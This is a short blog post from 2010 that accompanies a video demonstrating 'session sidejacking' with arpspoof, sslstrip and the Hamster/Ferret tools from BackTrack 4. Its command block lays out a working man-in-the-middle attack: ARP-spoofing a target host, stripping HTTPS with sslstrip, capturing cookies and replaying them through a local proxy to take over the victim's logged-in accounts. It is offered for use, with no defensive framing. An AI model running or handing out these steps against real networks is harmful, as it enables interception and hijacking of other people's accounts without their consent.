Monday, June 7, 2010

[Video] Session Sidejacking (Ferret and Hamster)

Watch video on-line: http://g0tmi1k.blip.tv/file/3288793
Download video: http://www.mediafire.com/?zzdwmyzm3mz
Commands: http://pastebin.com/dEt7SAcS


What is this?
This videos demos, how to "Session Sidejacking". Sidejacking is where you clone your targets cookies therefore your "sharing" their identity for that account (without ever knowing the username or password)!


What do I need?

> arpspoof
> sslstrip
> Hamster (and Ferret)
*all in BackTrack 4 Final*


Software
Name: arpspoof (DSniff)
Version: 2.3
Home Page: http://www.monkey.org/~dugsong/dsniff/
Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

Name: sslstrip
Version: 0.6
Home Page: http://www.thoughtcrime.org/software/sslstrip/index.html
Download Link: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz

Name: Hamster Sidejacking Tool
Version: 2.0
Home Page: http://hamster.erratasec.com/
Download Link: http://hamster.erratasec.com/downloads/hamster-2.0.0.tar.z


Commands:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.104 192.168.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f

/pentest/sniffers/hamster/ferret -i eth0

/pentest/sniffers/hamster/hamster

Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
Konqueror -> http://hamster

1 comment:

  1. Chào anh !
    Em xin bài viết của anh, nhưng phần link video bị hỏng, mong anh fix lại ạ !

    ReplyDelete